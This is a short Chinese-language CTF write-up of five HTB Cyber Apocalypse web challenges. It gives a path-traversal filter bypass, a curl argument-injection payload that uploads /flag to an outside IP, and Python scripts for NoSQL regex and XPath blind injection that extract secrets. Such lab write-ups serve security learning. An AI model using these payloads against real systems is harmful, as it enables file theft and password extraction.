前言
不算是一篇writeup,比较水,记录下自己的大致做题思路。主要还是这几天事情太多了,没那么多时间去打,只做了这几道简单的题目。
Inspector Gadget
进入看到CHTB{,f12发现有个main.js,第一行:
console.log("us3full_1nf0rm4tion}");
即CHTB{us3full_1nf0rm4tion}
MiniSTRyplace
源码下载下来审计一下,看到的第一行php代码就感觉有问题:
include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));
str_replace
是不行的,仍然可以任意读:
?lang=..././..././flag
比较简单
Caas
关键代码:
$router->new('POST', '/api/curl', 'CurlController@execute' );
public function __construct($url)
{
$this->command = "curl -sL " . escapeshellcmd($url);
}
public function exec()
{
exec($this->command, $output);
return $output;
}
执行curl命令,但是存在了escapeshellcmd
的过滤。
查一下:
直接读flag:
ip= -F password=@/flag http://118.31.168.198:39543/
Wild Goose Hunt
下载源码,是node.js。根据entrypoint.sh里的内容:
mongo heros --eval "db.createCollection('users')"
mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'
flag是在表里面,而且还是表的admin对应的password,用的mongodb,查询:
router.post('/api/login', (req, res) => {
let { username, password } = req.body;
if (username && password) {
return User.find({
username,
password
})
.then((user) => {
if (user.length == 1) {
return res.json({logged: 1, message: `Login Successful, welcome back ${user[0].username}.` });
} else {
return res.json({logged: 0, message: 'Login Failed'});
}
})
.catch(() => res.json({ message: 'Something went wrong'}));
}
return res.json({ message: 'Invalid username or password'});
});
应该是SQL注入,隐约对于mongodb有印象,是nosql注入,但是忘了,再看一下之前的关于nosql的文章:
nosql注入
考虑注出password,我这里用一下正则匹配来布尔注入,脚本:
import requests
url="http://139.59.174.238:31693/api/login"
headers={
'Content-Type': 'application/json'
}
flag = r"CHTB\\{"
data='{"username": {"$regex": "admin"},"password": {"$regex": "^%s.*"}}'
for i in range(60):
for j in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-":
if j == "}":
j == r"\\}"
r=requests.post(url=url,data=data%(flag+j),headers=headers)
if "Successful" in r.text:
flag+=j
print(flag)
if j == r"\\}":
exit()
break
E.Tree
附件下载下来是个xml,看到flag被分成了2块,猜测是xpath注入了,好久没xpath注入了又忘了咋做了,参考文章:
xpath注入
写个脚本爆一下:
import requests
url = "http://178.62.14.240:30145/api/search"
data1="{\"search\":\"'or substring(/military/district[position()=2]/staff[position()=3]/selfDestructCode,%s,1)='%s' or'\"}"
data2="{\"search\":\"'or substring(/military/district[position()=3]/staff[position()=2]/selfDestructCode,%s,1)='%s' or'\"}"
headers={
'Content-Type': 'application/json'
}
flag =""
for i in range(1,50):
for j in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-":
#print(data1%(i,j))
r=requests.post(url=url,headers=headers,data=data1%(i,j))
#print(r.text)
if "This millitary staff member exists" in r.text:
flag +=j
print(flag)
break